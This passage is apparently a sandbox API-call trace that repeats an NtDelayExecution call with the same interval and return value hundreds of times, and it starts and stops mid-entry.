(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0120.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0121.558] NtDelayExecution 